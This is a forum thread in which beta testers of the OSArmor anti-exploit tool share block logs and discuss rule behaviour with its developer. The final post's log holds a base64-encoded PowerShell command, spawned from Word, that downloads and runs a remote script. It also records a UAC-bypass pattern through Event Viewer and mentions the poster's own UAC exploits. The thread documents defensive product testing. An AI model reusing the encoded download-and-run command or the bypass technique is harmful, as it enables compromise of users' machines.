NoVirusThanks OSArmor: An Additional Layer of Defense

Azure Phoenix · Jan 16, 2018

JoWazzoo said: ↑

Do we have a list of acronyms? If not (I have not found it), we need one.
Click to expand...

https://www.acronymfinder.com/Software-Restriction-Policy-(Microsoft)-(SRP).html

bjm_ · Jan 16, 2018

...(test24) all rules checked and no exclusions...
Run executable file from desktop in default sandbox > ERP popup > OSA quiet.
Run executable file from desktop > ERP popup > OSA popup Suspicious Process Blocked - Block execution of unsigned processes on Desktop folder.

Date/Time: 1/16/2018 4:02:13 PM
Process: [9024]C:\Users\bjms\Desktop\Windows ISO Downloader.exe
Parent: [4300]C:\Windows\explorer.exe
Rule: BlockUnsignedProcessesOnDesktop
Rule Name: Block execution of unsigned processes on Desktop folder
Command Line: "C:\Users\bjms\Desktop\Windows ISO Downloader.exe"
Signer:
Parent Signer: Microsoft Windows

Date/Time: 1/16/2018 4:05:17 PM
Process: [5812]C:\Users\bjms\Desktop\Windows ISO Downloader.exe
Parent: [4300]C:\Windows\explorer.exe
Rule: BlockUnsignedProcessesOnDesktop
Rule Name: Block execution of unsigned processes on Desktop folder
Command Line: "C:\Users\bjms\Desktop\Windows ISO Downloader.exe"
Signer:
Parent Signer: Microsoft Windows

Date/Time: 1/16/2018 4:29:33 PM
Process: [8176]C:\Users\bjms\Desktop\Windows ISO Downloader.exe
Parent: [4300]C:\Windows\explorer.exe
Rule: BlockUnsignedProcessesOnDesktop
Rule Name: Block execution of unsigned processes on Desktop folder
Command Line: "C:\Users\bjms\Desktop\Windows ISO Downloader.exe"
Signer:
Parent Signer: Microsoft Windows

Date/Time: 1/16/2018 4:43:30 PM
Process: [8320]C:\Users\bjms\Desktop\Windows ISO Downloader.exe
Parent: [4300]C:\Windows\explorer.exe
Rule: BlockUnsignedProcessesOnDesktop
Rule Name: Block execution of unsigned processes on Desktop folder
Command Line: "C:\Users\bjms\Desktop\Windows ISO Downloader.exe"
Signer:
Parent Signer: Microsoft Windows

Date/Time: 1/16/2018 4:53:00 PM
Process: [2464]C:\Users\bjms\Desktop\Windows ISO Downloader.exe
Parent: [4300]C:\Windows\explorer.exe
Rule: BlockUnsignedProcessesOnDesktop
Rule Name: Block execution of unsigned processes on Desktop folder
Command Line: "C:\Users\bjms\Desktop\Windows ISO Downloader.exe"
Signer:
Parent Signer: Microsoft Windows

Date/Time: 1/16/2018 4:53:15 PM
Process: [6752]C:\Users\bjms\Desktop\Windows ISO Downloader.exe
Parent: [4300]C:\Windows\explorer.exe
Rule: BlockUnsignedProcessesOnDesktop
Rule Name: Block execution of unsigned processes on Desktop folder
Command Line: "C:\Users\bjms\Desktop\Windows ISO Downloader.exe"
Signer:
Parent Signer: Microsoft Windows

bjm_ · Jan 16, 2018

...(test24) all rules checked and no exclusions...
Run executable file from desktop in default sandbox > ERP popup > OSA popup Suspicious Process Blocked - Block execution of unsigned processes on Local AppData.

Date/Time: 1/16/2018 6:48:03 PM
Process: [7880]D:\Sandbox\bjms\Default\user\current\AppData\Local\Temp\7zSC4B8.tmp\7zr.exe
Parent: [6900]D:\Sandbox\bjms\Default\user\current\AppData\Local\Temp\7zSC4B8.tmp\BlueStacks-Installer_3.55.70.1783.exe
Rule: BlockUnsignedProcessesAppDataLocal
Rule Name: Block execution of unsigned processes on Local AppData
Command Line: "C:\Users\bjms\AppData\Local\Temp\7zSC4B8.tmp\7zr.exe" x "C:\Users\bjms\AppData\Local\Temp\7zSC4B8.tmp\client.zip" -o"C:\ProgramData\BlueStacksSetup\Client" -aoa
Signer:
Parent Signer: BlueStack Systems, Inc.

Date/Time: 1/16/2018 6:48:04 PM
Process: [8612]D:\Sandbox\bjms\Default\user\current\AppData\Local\Temp\7zSC4B8.tmp\HD-zip.exe
Parent: [6900]D:\Sandbox\bjms\Default\user\current\AppData\Local\Temp\7zSC4B8.tmp\BlueStacks-Installer_3.55.70.1783.exe
Rule: BlockUnsignedProcessesAppDataLocal
Rule Name: Block execution of unsigned processes on Local AppData
Command Line: "C:\Users\bjms\AppData\Local\Temp\7zSC4B8.tmp\HD-zip.exe" -r archive.zip *
Signer:
Parent Signer: BlueStack Systems, Inc.

Date/Time: 1/16/2018 6:53:28 PM
Process: [9148]D:\Sandbox\bjms\Default\user\current\AppData\Local\Temp\7zSBD5D.tmp\7zr.exe
Parent: [1620]D:\Sandbox\bjms\Default\user\current\AppData\Local\Temp\7zSBD5D.tmp\BlueStacks-Installer_3.55.70.1783.exe
Rule: BlockUnsignedProcessesAppDataLocal
Rule Name: Block execution of unsigned processes on Local AppData
Command Line: "C:\Users\bjms\AppData\Local\Temp\7zSBD5D.tmp\7zr.exe" x "C:\Users\bjms\AppData\Local\Temp\7zSBD5D.tmp\client.zip" -o"C:\ProgramData\BlueStacksSetup\Client" -aoa
Signer:
Parent Signer: BlueStack Systems, Inc.

Date/Time: 1/16/2018 6:53:29 PM
Process: [3520]D:\Sandbox\bjms\Default\user\current\AppData\Local\Temp\7zSBD5D.tmp\HD-zip.exe
Parent: [1620]D:\Sandbox\bjms\Default\user\current\AppData\Local\Temp\7zSBD5D.tmp\BlueStacks-Installer_3.55.70.1783.exe
Rule: BlockUnsignedProcessesAppDataLocal
Rule Name: Block execution of unsigned processes on Local AppData
Command Line: "C:\Users\bjms\AppData\Local\Temp\7zSBD5D.tmp\HD-zip.exe" -r archive.zip *
Signer:
Parent Signer: BlueStack Systems, Inc.

Date/Time: 1/16/2018 7:29:08 PM
Process: [3836]D:\Sandbox\bjms\Test\user\current\AppData\Local\Temp\is-NDDC6.tmp\filmora_64bit_full846.tmp
Parent: [10948]D:\Sandbox\bjms\Test\user\public\Documents\Wondershare\filmora_64bit_full846.exe
Rule: BlockUnsignedProcessesAppDataLocal
Rule Name: Block execution of unsigned processes on Local AppData
Command Line: "C:\Users\bjms\AppData\Local\Temp\is-NDDC6.tmp\filmora_64bit_full846.tmp" /SL5="$DC04A4,215094197,361984,C:\Users\Public\Documents\Wondershare\filmora_64bit_full846.exe" /VERYSILENT /NOPAGE /LANG=ENG /LOG="C:\Users\bjms\AppData\Local\Temp\WAE-Wondershare Filmora.log" /installpath: "C:\Program Files (x86)\Wondershare\Wondershare Filmora\" /DIR="C:\Program Files (x86)\Wondershare\Wondershare Filmora\"
Signer:
Parent Signer: Wondershare Technology Co.,Ltd

Date/Time: 1/16/2018 7:49:14 PM
Process: [9820]D:\Sandbox\bjms\Default\user\current\AppData\Local\Temp\is-9ERVV.tmp\filmora_64bit_full846.tmp
Parent: [6092]D:\Sandbox\bjms\Default\user\public\Documents\Wondershare\filmora_64bit_full846.exe
Rule: BlockUnsignedProcessesAppDataLocal
Rule Name: Block execution of unsigned processes on Local AppData
Command Line: "C:\Users\bjms\AppData\Local\Temp\is-9ERVV.tmp\filmora_64bit_full846.tmp" /SL5="$7A0640,215094197,361984,C:\Users\Public\Documents\Wondershare\filmora_64bit_full846.exe" /VERYSILENT /NOPAGE /LANG=ENG /LOG="C:\Users\bjms\AppData\Local\Temp\WAE-Wondershare Filmora.log" /installpath: "C:\Program Files\Wondershare\Wondershare Filmora\" /DIR="C:\Program Files\Wondershare\Wondershare Filmora\"
Signer:
Parent Signer: Wondershare Technology Co.,Ltd

Date/Time: 1/16/2018 7:50:46 PM
Process: [3444]D:\Sandbox\bjms\Test\user\current\AppData\Local\Temp\is-PFHLF.tmp\filmora_64bit_full846.tmp
Parent: [10712]D:\Sandbox\bjms\Test\user\public\Documents\Wondershare\filmora_64bit_full846.exe
Rule: BlockUnsignedProcessesAppDataLocal
Rule Name: Block execution of unsigned processes on Local AppData
Command Line: "C:\Users\bjms\AppData\Local\Temp\is-PFHLF.tmp\filmora_64bit_full846.tmp" /SL5="$7104C0,215094197,361984,C:\Users\Public\Documents\Wondershare\filmora_64bit_full846.exe" /VERYSILENT /NOPAGE /LANG=ENG /LOG="C:\Users\bjms\AppData\Local\Temp\WAE-Wondershare Filmora.log" /installpath: "C:\Program Files\Wondershare\Wondershare Filmora\" /DIR="C:\Program Files\Wondershare\Wondershare Filmora\"
Signer:
Parent Signer: Wondershare Technology Co.,Ltd

Date/Time: 1/16/2018 7:52:17 PM
Process: [10612]D:\Sandbox\bjms\Default\user\current\AppData\Local\Temp\is-GFQBP.tmp\filmora_64bit_full846.tmp
Parent: [6636]D:\Sandbox\bjms\Default\user\public\Documents\Wondershare\filmora_64bit_full846.exe
Rule: BlockUnsignedProcessesAppDataLocal
Rule Name: Block execution of unsigned processes on Local AppData
Command Line: "C:\Users\bjms\AppData\Local\Temp\is-GFQBP.tmp\filmora_64bit_full846.tmp" /SL5="$5004A0,215094197,361984,C:\Users\Public\Documents\Wondershare\filmora_64bit_full846.exe" /VERYSILENT /NOPAGE /LANG=ENG /LOG="C:\Users\bjms\AppData\Local\Temp\WAE-Wondershare Filmora.log" /installpath: "C:\Program Files\Wondershare\Wondershare Filmora\" /DIR="C:\Program Files\Wondershare\Wondershare Filmora\"
Signer:
Parent Signer: Wondershare Technology Co.,Ltd

askmark · Jan 17, 2018

novirusthanks said: ↑

@askmark

Will install Office 365 and try to reproduce the issue.

Question 1: Can you reproduce it always? I mean if you first open OfficeC2RClient.exe and then open OSArmorDevCfg, it is always blocked from running by OfficeC2RClient.exe?

Question 2: Was VS installed and active when OSArmorDevCfg could not start?
Click to expand...

I'm not able to reproduce as OfficeC2RClient.exe doesn't appear to run manually and instead runs when an update is being processed. It may have just been bad timing on my part.

Voodooshield was installed at the time but only the service was running. The gui process itself was not active and had been closed. As far as I know VS relies on the gui process for all process activity.

novirusthanks · Jan 17, 2018

Here is a new v1.4 (pre-release) (test25):
http://downloads.novirusthanks.org/files/osarmor_setup_1.4_test25.exe

*** Please do not share the download link, we will delete it when we'll release the official v1.4 ***

So far this is what's new compared to the previous pre-release:

+ On Configurator -> Settings -> Enable internal rules for allowing safe behaviors (checked)
** The above option was requested by a company so they can disable it and use only their exclusions **
** We highly recommend to any user to keep the above option always checked **
+ On Configurator -> Settings -> Set notification window always on top (checked)
+ On Configurator -> Advanced -> Block reg.exe from disabling UAC (unchecked)
+ On Configurator -> Advanced -> Block execution of processes on Public Folder (unchecked)
+ On Configurator -> Advanced -> Block processes executed from RuntimeBroker (unchecked)
+ On Configurator -> Advanced -> Block execution of SubInACL.exe (unchecked)
+ On Configurator -> Advanced -> Block execution of Shutdown.exe (unchecked)
+ On Configurator -> Advanced -> Block execution of At.exe (unchecked)
+ Added new internal rules to block suspicious processes
+ Many fixes and improvements

Here are two new videos:
Another XLS (Excel) Payload Blocked by OSArmor
Request.doc Exploit Payload Blocked by OSArmor

@bjm_

Should be fixed in test 25, thanks for reporting.

@askmark

If you notice again that issue (Configurator can't be opened) please let me know.

Also please update VS to 4.16 (some users reported the Configurator issue as fixed within that new version).

@Buddel

We added some improvements, but please note that sometimes (i.e when processes are executed) it may use from 1 to 10% of CPU for 1 second (or similar).

That is because it makes some internal checks to validate the process signature, etc.

As long as the CPU goes back to 0% there are no issues (nothing to worry about).

However, we may further improve this in the next version by implementing a caching system.

//Everyone

We noticed an issue when switching from Admin->LUA->Admin:

- Power on the PC and select the Admin account (OSArmor icon is present)
- Switch to a LUA user (OSArmor icon is present)
- Switch back to Admin user (OSArmor icon is not present)

We'll fix this on the next build.

bjm_ · Jan 17, 2018

novirusthanks said: ↑

@bjm_
Should be fixed in test 25, thanks for reporting.
Click to expand...

Um, @novirusthanks .... if you're referring to #652. My observe with (test25) is the same as #652.

novirusthanks · Jan 17, 2018

@bjm_

Build 25 now properly detects Temp folder when "Block unsigned processes on Temp folder" or "Block unsigned processes on Local AppData" are checked.

It should not block processes on like:
Code:
D:\Sandbox\user\Default\user\current\AppData\Local\Temp\7zSC4B8.tmp\7zr.exe
@BlackBox Hacker

You have quoted test 24, the last post I made is for test 25.

Also please consider editing your post instead of creating a new one with the same quoted text and just one line of text, thanks

Else it is difficult for other users to scroll the thread

have you fixed the blocking on root 'C:\' drive?
Click to expand...

That is not an issue, you can enable the blocking of unsigned processes on C:\ and other things via the Configurator -> Advanced tab.

We'll decide what other options enable by default prior to releasing the final v1.4.

BlackBox Hacker · Jan 17, 2018

novirusthanks said: ↑
@bjm_

Build 25 now properly detects Temp folder when "Block unsigned processes on Temp folder" or "Block unsigned processes on Local AppData" are checked.

It should not block processes on like:
Code:
D:\Sandbox\user\Default\user\current\AppData\Local\Temp\7zSC4B8.tmp\7zr.exe
@BlackBox Hacker

You have quoted test 24, the last post I made is for test 25.

Also please consider editing your post instead of creating a new one with the same quoted text and just one line of text, thanks

Else it is difficult for other users to scroll the thread

That is not an issue, you can enable the blocking of unsigned processes on C:\ and other things via the Configurator -> Advanced tab.

We'll decide what other options enable by default prior to releasing the final v1.4.
Click to expand...
Is it possible to still load unsigned processes on desktop, but still block from any other system path this is what I mean?

bjm_ · Jan 17, 2018

novirusthanks said: ↑
@bjm_
Build 25 now properly detects Temp folder when "Block unsigned processes on Temp folder" or "Block unsigned processes on Local AppData" are checked.
It should not block processes on like:
Code:
D:\Sandbox\user\Default\user\current\AppData\Local\Temp\7zSC4B8.tmp\7zr.exe
Click to expand...
Okay. I'll re-test #653. FWIW ~ I still think there's a hiccup in #652.
Thanks

BlackBox Hacker · Jan 17, 2018

novirusthanks said: ↑
@bjm_

Build 25 now properly detects Temp folder when "Block unsigned processes on Temp folder" or "Block unsigned processes on Local AppData" are checked.

It should not block processes on like:
Code:
D:\Sandbox\user\Default\user\current\AppData\Local\Temp\7zSC4B8.tmp\7zr.exe
@BlackBox Hacker

You have quoted test 24, the last post I made is for test 25.

Also please consider editing your post instead of creating a new one with the same quoted text and just one line of text, thanks

Else it is difficult for other users to scroll the thread

That is not an issue, you can enable the blocking of unsigned processes on C:\ and other things via the Configurator -> Advanced tab.

We'll decide what other options enable by default prior to releasing the final v1.4.
Click to expand...
Very good binary blocks on root 'c:\' but didn't block in folder C:\Windows?

novirusthanks · Jan 17, 2018

@BlackBox Hacker

A process needs Admin rights to drop an exe file on C:\WINDOWS\, \System32\, etc.

@bjm_

Run executable file from desktop in default sandbox > ERP popup > OSA quiet.
Click to expand...

That is correct, because a process inside the Sandbox is opened from:
Code:
C:\Sandbox\User\DefaultBox\user\current\Desktop
That is not the user Desktop folder:
Code:
C:\Users\User\Desktop

BlackBox Hacker · Jan 17, 2018

novirusthanks said: ↑

@BlackBox Hacker

A process needs Admin rights to drop an exe file on C:\WINDOWS\, \System32\, etc.
Click to expand...

I could test one of my UAC exploits to see if code will copy? Plus I think you should add DLL Blocking!

bjm_ · Jan 17, 2018

novirusthanks said: ↑
@bjm_

Run executable file from desktop in default sandbox > ERP popup > OSA quiet.
Click to expand...

That is correct, because a process inside the Sandbox is opened from:
Code:
C:\Sandbox\User\DefaultBox\user\current\Desktop
That is not the user Desktop folder.
Click to expand...
Edit:....and when I move the file into new desktop folder and then Run Sandboxed that folder and then launch the executable from the sandboxed folder. OSA speaks to me.

novirusthanks · Jan 17, 2018

@bjm_

Can you share a sample log?

I tried this:

1) I create a folder in C:\Users\Dev\Desktop\New Folder
2) I place an unsigned exe inside that folder and I double click it -> OSA blocked it:

Date/Time: 18/01/2018 01:27:34
Process: [6100]C:\Users\Dev\Desktop\New Folder\7z.exe
Parent: [2736]C:\Windows\explorer.exe
Rule: BlockUnsignedProcessesOnDesktop
Rule Name: Block execution of unsigned processes on Desktop folder
Command Line: "C:\Users\Dev\Desktop\New Folder\7z.exe"
Signer:
Parent Signer:
Click to expand...

If I right-click on C:\Users\Dev\Desktop\New Folder\7z.exe and then I select "Run Sandboxed", OSA doesn't block it.

It is because it runs inside the Sandbox and OSA do not recognise:

C:\Sandbox\User\DefaultBox\user\current\Desktop
Click to expand...

As the user Desktop folder (test 25).

Peter2150 · Jan 17, 2018

Hi Andreas

This was a no go for me. Uninstalled 24, and installed 25. Install looked fine, but it never came up. No tray icon and when I opened it with the dekstop icon it showed disabled. Right clicking on it didn't enable it. Tried twice. Did a restore, before my brain said logs.

Anything you want me to try

Pete

Peter2150 · Jan 17, 2018

Is recognizing the sandbox on your to do list. Remember you had to do that for ERP

bjm_ · Jan 17, 2018

novirusthanks said: ↑

@bjm_
Can you share a sample log?
I tried this:
1) I create a folder in C:\Users\Dev\Desktop\New Folder
2) I place an unsigned exe inside that folder and I double click it -> OSA blocked it:
Click to expand...

(test25)
Date/Time: 1/17/2018 7:49:10 PM
Process: [6040]C:\Users\bjms\AppData\Local\Temp\7zSB42A.tmp\7zr.exe
Parent: [3028]C:\Users\bjms\AppData\Local\Temp\7zSB42A.tmp\BlueStacks-Installer_3.55.70.1783.exe
Rule: BlockUnsignedProcessesAppDataLocal
Rule Name: Block execution of unsigned processes on Local AppData
Command Line: "C:\Users\bjms\AppData\Local\Temp\7zSB42A.tmp\7zr.exe" x "C:\Users\bjms\AppData\Local\Temp\7zSB42A.tmp\client.zip" -o"C:\ProgramData\BlueStacksSetup\Client" -aoa
Signer:
Parent Signer: BlueStack Systems, Inc.

Date/Time: 1/17/2018 7:49:11 PM
Process: [6208]C:\Users\bjms\AppData\Local\Temp\7zSB42A.tmp\HD-zip.exe
Parent: [3028]C:\Users\bjms\AppData\Local\Temp\7zSB42A.tmp\BlueStacks-Installer_3.55.70.1783.exe
Rule: BlockUnsignedProcessesAppDataLocal
Rule Name: Block execution of unsigned processes on Local AppData
Command Line: "C:\Users\bjms\AppData\Local\Temp\7zSB42A.tmp\HD-zip.exe" -r archive.zip *
Signer:
Parent Signer: BlueStack Systems, Inc.

.... and then I select "Run Sandboxed", OSA doesn't block it.
Click to expand...

Yes, same sample with "Run Sandboxed" , OSA doesn't block it.

novirusthanks · Jan 17, 2018

@Peter2150

Can you try to uninstall it, reboot, delete C:\Program Files\NoVirusThanks\OSArmorDev\ and then install test 25?

Is recognizing the sandbox on your to do list. Remember you had to do that for ERP
Click to expand...

Not for v1.4, but may be for next version.

@BlackBox Hacker

We can add a new rule like "Block non-system and unsigned processes on Windows folder".

Will block non-system and unsigned processes also on subfolders of course.

@bjm_

Process: [6040]C:\Users\bjms\AppData\Local\Temp\7zSB42A.tmp\7zr.exe
Rule Name: Block execution of unsigned processes on Local AppData
Signer:
Click to expand...

That block-event is correct for the rule "Block execution of unsigned processes on Local AppData".

It blocks also processes in subfolders, and \Temp\ is a subfolder of Local AppData.

Yes, same sample with "Run Sandboxed" , OSA doesn't block it.
Click to expand...

That is correct.

bjm_ · Jan 17, 2018

novirusthanks said: ↑

@bjm_
That block-event is correct for the rule "Block execution of unsigned processes on Local AppData".
It blocks also processes in subfolders, and \Temp\ is a subfolder of Local AppData.
That is correct.
Click to expand...

So, my observe with (test24) #653 ... OSA recognizing sandboxed file was fixed with (test25).

Peter2150 · Jan 17, 2018

novirusthanks said: ↑

@Peter2150

Can you try to uninstall it, reboot, delete C:\Program Files\NoVirusThanks\OSArmorDev\ and then install test 25?

[\quote]

That is what I did. I'll do it again tomorrow and get logs.
Click to expand...

BlackBox Hacker · Jan 17, 2018

http://[]

novirusthanks said: ↑

@Peter2150

Can you try to uninstall it, reboot, delete C:\Program Files\NoVirusThanks\OSArmorDev\ and then install test 25?

Not for v1.4, but may be for next version.

@BlackBox Hacker

We can add a new rule like "Block non-system and unsigned processes on Windows folder".

Will block non-system and unsigned processes also on subfolders of course.

@bjm_

That block-event is correct for the rule "Block execution of unsigned processes on Local AppData".

It blocks also processes in subfolders, and \Temp\ is a subfolder of Local AppData.

That is correct.
Click to expand...

We can add a new rule like "Block non-system and unsigned processes on Windows folder".

Will block non-system and unsigned processes also on subfolders of course.

That would be really great!

BlackBox Hacker · Jan 17, 2018

I've never seen this which is very cool an exploit that is blocked half way, but still has a UAC copy bypass that still works! Plus I have also found another way to drop on hard drive without this exploit, which will always bypass OSArmor protection. Only three UAC exploits that still work all the rest are blocked very good! I was very sneaky on making these exploits work all I did is compile most of them from script form. If you can block unknown executable files executing from locations 'C:\Windows' and 'C:\Windows\system32' then you would have secured UAC from exploits nice.

Log:

Code:

Date/Time: 18/01/2018 00:09:36
Process: [2488]C:\RemoteDll32.exe
Parent: [1820]C:\Windows\explorer.exe
Rule: BlockProcessesOnRootFolders
Rule Name: Block unsigned processes located on root folder (i.e C:\)
Command Line: "C:\RemoteDll32.exe"
Signer:
Parent Signer:

Date/Time: 18/01/2018 00:12:14
Process: [3284]C:\Users\BlackBox\RemoteDll32.exe
Parent: [1820]C:\Windows\explorer.exe
Rule: BlockProcessesOnSuspiciousFolders
Rule Name: Block processes located in suspicious folders
Command Line: "C:\Users\BlackBox\RemoteDll32.exe"
Signer:
Parent Signer:

Date/Time: 18/01/2018 00:13:08
Process: [1864]C:\Users\BlackBox\Music\RemoteDll32.exe
Parent: [1820]C:\Windows\explorer.exe
Rule: BlockProcessesOnSuspiciousFolders
Rule Name: Block processes located in suspicious folders
Command Line: "C:\Users\BlackBox\Music\RemoteDll32.exe"
Signer:
Parent Signer:

Date/Time: 18/01/2018 00:17:55
Process: [2660]C:\Windows\System32\cmd.exe
Parent: [1820]C:\Windows\explorer.exe
Rule: BlockBATScripts
Rule Name: Block execution of .bat scripts
Command Line: C:\Windows\system32\cmd.exe /c ""C:\Users\BlackBox\Desktop\test.bat" "
Signer:
Parent Signer:

Date/Time: 18/01/2018 00:18:00
Process: [2512]C:\Windows\System32\wscript.exe
Parent: [1820]C:\Windows\explorer.exe
Rule: BlockVbsScripts
Rule Name: Block execution of .vbs scripts
Command Line: "C:\Windows\System32\WScript.exe" "C:\Users\BlackBox\Desktop\test.vbs"
Signer:
Parent Signer:

Date/Time: 18/01/2018 00:19:01
Process: [1068]C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent: [2264]C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Rule: AntiExploitMicrosoftWord
Rule Name: (Anti-Exploit) Protect Microsoft Word
Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAHAAIAAtAGMAIAAiAGkAZQB4ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADUALwBzAHkAcwB0AGUAbQAuAHAAcwAxACcAKQAiAA==
Signer:
Parent Signer: Microsoft Corporation

Date/Time: 18/01/2018 00:22:05
Process: [2836]C:\Users\BlackBox\AppData\Local\Temp\7ZipSfx.009\Perl_Exploit\bin\perl.exe
Parent: [1412]C:\Users\BlackBox\Desktop\exploit.exe
Rule: BlockUnsignedProcessesAppDataLocal
Rule Name: Block execution of unsigned processes on Local AppData
Command Line: "C:\Users\BlackBox\AppData\Local\Temp\7ZipSfx.009\Perl_Exploit\bin\perl.exe" C:\Users\BlackBox\AppData\Local\Temp\7ZipSfx.009\Perl_Exploit\bin\update.pl
Signer:
Parent Signer:

Date/Time: 18/01/2018 00:24:19
Process: [3740]C:\Users\BlackBox\AppData\Local\Adersoft\Installation\vbsedit7zip.exe
Parent: [2116]C:\Users\BlackBox\Downloads\vbsedit.exe
Rule: BlockUnsignedProcessesAppDataLocal
Rule Name: Block execution of unsigned processes on Local AppData
Command Line: "C:\Users\BlackBox\AppData\Local\Adersoft\Installation\vbsedit7zip.exe" -o"C:\Users\BlackBox\AppData\Local\Adersoft\Installation" -p123VBSEDIT987 -y
Signer:
Parent Signer: Adersoft

Date/Time: 18/01/2018 00:26:04
Process: [3740]C:\Users\BlackBox\AppData\Local\Adersoft\Installation\vbsedit7zip.exe
Parent: [3892]C:\Users\BlackBox\Downloads\vbsedit.exe
Rule: BlockUnsignedProcessesAppDataLocal
Rule Name: Block execution of unsigned processes on Local AppData
Command Line: "C:\Users\BlackBox\AppData\Local\Adersoft\Installation\vbsedit7zip.exe" -o"C:\Users\BlackBox\AppData\Local\Adersoft\Installation" -p123VBSEDIT987 -y
Signer:
Parent Signer: Adersoft

Date/Time: 18/01/2018 00:39:25
Process: [1800]C:\Windows\System32\mmc.exe
Parent: [832]C:\Windows\System32\dllhost.exe
Rule: BlockMSCScripts
Rule Name: Block execution of .msc scripts
Command Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\wf.msc"
Signer:
Parent Signer:

Date/Time: 18/01/2018 00:40:29
Process: [1228]C:\Windows\System32\mmc.exe
Parent: [1820]C:\Windows\explorer.exe
Rule: BlockMSCScripts
Rule Name: Block execution of .msc scripts
Command Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\WF.msc"
Signer:
Parent Signer:

Date/Time: 18/01/2018 00:45:56
Process: [4024]C:\Users\BlackBox\AppData\Local\Temp\7ZipSfx.009\Perl_Exploit\bin\perl.exe
Parent: [1508]C:\Users\BlackBox\Desktop\exploit.exe
Rule: BlockUnsignedProcessesAppDataLocal
Rule Name: Block execution of unsigned processes on Local AppData
Command Line: "C:\Users\BlackBox\AppData\Local\Temp\7ZipSfx.009\Perl_Exploit\bin\perl.exe" C:\Users\BlackBox\AppData\Local\Temp\7ZipSfx.009\Perl_Exploit\bin\update.pl
Signer:
Parent Signer:

Date/Time: 18/01/2018 00:47:32
Process: [3292]C:\Windows\System32\cmd.exe
Parent: [3800]C:\Windows\System32\eventvwr.exe
Rule: AntiExploitMicrosoftEventViewer
Rule Name: (Anti-Exploit) Protect Microsoft Event Viewer
Command Line: "cmd.exe" /cC:\Users\BlackBox\Desktop\installer.exe
Signer:
Parent Signer:

Date/Time: 18/01/2018 01:58:14
Process: [2976]C:\Users\BlackBox\Desktop\New Projects\Secure Backdoor 2.0.exe
Parent: [1820]C:\Windows\explorer.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: "C:\Users\BlackBox\Desktop\New Projects\Secure Backdoor 2.0.exe"
Signer:
Parent Signer:

Date/Time: 18/01/2018 01:58:45
Process: [3788]C:\Windows\System32\dllhost.exe
Parent: [672]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Signer:
Parent Signer:

Date/Time: 18/01/2018 01:59:00
Process: [652]C:\Windows\System32\taskeng.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: taskeng.exe {25DCCDC9-F0E6-41ED-B520-AF5541AC6A57} S-1-5-18:NT AUTHORITY\System:Service:
Signer:
Parent Signer:

Date/Time: 18/01/2018 01:59:03
Process: [3424]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1162 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:07
Process: [2728]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:10
Process: [3760]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:11
Process: [2832]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:13
Process: [3960]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:13
Process: [3828]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:14
Process: [4024]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:15
Process: [1800]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:16
Process: [3316]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:17
Process: [836]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:18
Process: [3472]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
